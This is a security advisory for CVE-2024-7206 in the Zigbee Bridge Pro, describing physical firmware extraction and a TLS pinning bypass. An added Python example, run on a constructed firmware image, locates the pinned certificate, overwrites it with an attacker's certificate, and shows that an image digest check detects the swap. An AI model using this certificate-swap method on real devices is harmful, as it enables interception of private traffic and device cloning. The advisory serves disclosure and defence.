Security Advisory – Firmware extraction and Hardware SSL Pinning Bypass
Title | Security Advisory – Firmware extraction and Hardware SSL Pinning Bypass |
---|---|
Release Date | 8/10/2024 |
Abstract | An attacker with physical access can extract the device firmware and analyse it to mount further attacks, such as decrypting the TLS traffic between the device and the cloud, or extracting secrets in order to clone the device. CVE ID: CVE-2024-7206 |
Affected Product | Zigbee Bridge Pro |
Affected Version | 2.0.0 and earlier |
Impact | An attacker can use this vulnerability to decrypt the traffic between the device and the cloud service, analyse the device's behaviour, and recover private data stored in the hardware, which enables further attacks such as cloning the device. |
Technical Details | Exploitation preconditions: 1. Physical access to disassemble the device. 2. A PC connected to the device's serial port. Technical details: Once connected over the serial port, the attacker dumps the firmware with a flashing tool. Analysing the binary reveals the certificate the firmware pins for its TLS connection to the cloud; the attacker replaces it with a certificate signed by the attacker, repackages the image and writes it back to the device, which boots the modified image. Because the device now trusts the attacker's certificate, the attacker can act as a man-in-the-middle and read the plaintext of the otherwise encrypted traffic between the device and the server. |
Resolution | Upgrade to firmware 2.1.0 or later. Devices left on 2.0.0 or earlier remain exploitable by anyone with physical access to the board. |
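The certificate-swap step in the technical details, and the integrity check that would catch it, as an added example that is not part of the advisory or the vendor's tooling. Everything in it is constructed: the firmware image layout (header, some binary, one PEM certificate stored as plain text, trailer), the DER placeholders, and the assumption that the pin is a PEM string rather than a DER blob or a hash, which this scanner would not find.

```python
"""Locate the PEM certificate pinned in a firmware image, swap it for an
attacker-signed one, and show that a plain image digest catches the swap.

Added example, not code from the advisory or the vendor. Everything here
is constructed: the firmware image layout (a header, padding, one PEM
certificate stored as plain text, a trailer) and the DER placeholders.
Real firmware may store the pin as a DER blob or a hash instead of PEM,
which this scanner would not find.
"""
import base64
import hashlib
import re

# PEM armour is easy to spot in a raw dump; the body is base64, so it is
# printable and survives `strings`-style triage too.
PEM_RE = re.compile(
    rb"-----BEGIN CERTIFICATE-----\r?\n.*?\r?\n-----END CERTIFICATE-----",
    re.DOTALL,
)


def make_pem(der: bytes) -> bytes:
    """Wrap bytes in PEM armour (64-char lines, no trailing newline).

    Used only to build constructed placeholders; the bytes are not real DER.
    """
    b64 = base64.b64encode(der)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b"-----BEGIN CERTIFICATE-----\n" + b"\n".join(lines)
            + b"\n-----END CERTIFICATE-----")


def find_certs(image: bytes):
    """Return (offset, pem_bytes) for every PEM certificate block in the image."""
    return [(m.start(), m.group(0)) for m in PEM_RE.finditer(image)]


def fingerprint(pem: bytes) -> str:
    """SHA-256 of the base64-decoded body, i.e. what a pin check usually compares."""
    body = b"".join(line.strip() for line in pem.splitlines()[1:-1])
    return hashlib.sha256(base64.b64decode(body)).hexdigest()


def patch_cert(image: bytes, offset: int, old_pem: bytes, new_pem: bytes) -> bytes:
    """Overwrite the pinned certificate in place.

    The replacement must not be longer than the original: code elsewhere in
    the image may hold the old offset and size, so growing the string would
    clobber whatever follows it. A shorter replacement is NUL-padded so the
    C string still terminates where the original did and every later offset
    is unchanged.
    """
    if image[offset:offset + len(old_pem)] != old_pem:
        raise ValueError("original certificate not found at the given offset")
    if len(new_pem) > len(old_pem):
        raise ValueError(
            f"replacement is {len(new_pem) - len(old_pem)} bytes too long; "
            "it would overwrite adjacent data"
        )
    padded = new_pem + b"\x00" * (len(old_pem) - len(new_pem))
    return image[:offset] + padded + image[offset + len(old_pem):]


def image_digest(image: bytes) -> str:
    """Digest of the whole image: the minimum a boot-time integrity check compares."""
    return hashlib.sha256(image).hexdigest()


# Constructed placeholders (not real certificates).
VENDOR_DER = b"CONSTRUCTED PLACEHOLDER: vendor cloud CA, not real DER " * 4
ATTACKER_DER = b"CONSTRUCTED PLACEHOLDER: attacker CA " * 4
VENDOR_PEM = make_pem(VENDOR_DER)
ATTACKER_PEM = make_pem(ATTACKER_DER)

# Constructed firmware image: header, some binary, a labelled cert, trailer.
FIRMWARE = (
    b"FWIMG\x00\x02\x00\x00" + bytes(range(256))
    + b"\x00cloud_ca\x00" + VENDOR_PEM + b"\n"
    + b"\x00" * 16 + b"https://cloud.example/\x00"
)


def demo():
    """Walk through the advisory's steps on the constructed image."""
    certs = find_certs(FIRMWARE)
    offset, pem = certs[0]
    print(f"found {len(certs)} cert(s); first at 0x{offset:x}, "
          f"fingerprint {fingerprint(pem)[:16]}...")
    patched = patch_cert(FIRMWARE, offset, pem, ATTACKER_PEM)
    print(f"patched fingerprint {fingerprint(find_certs(patched)[0][1])[:16]}...")
    print("image digest changed:", image_digest(patched) != image_digest(FIRMWARE))
    return patched


if __name__ == "__main__":
    demo()
```

The patched image differs from the original by a single region, so any boot-time check that verifies a digest or signature over the image would reject it; the attack described in the advisory depends on the device booting the modified image without such a check. On the analysis side, running the scanner over a real dump tells you whether the pin is stored as plain PEM at all, which is the first thing to verify before trying to replace it.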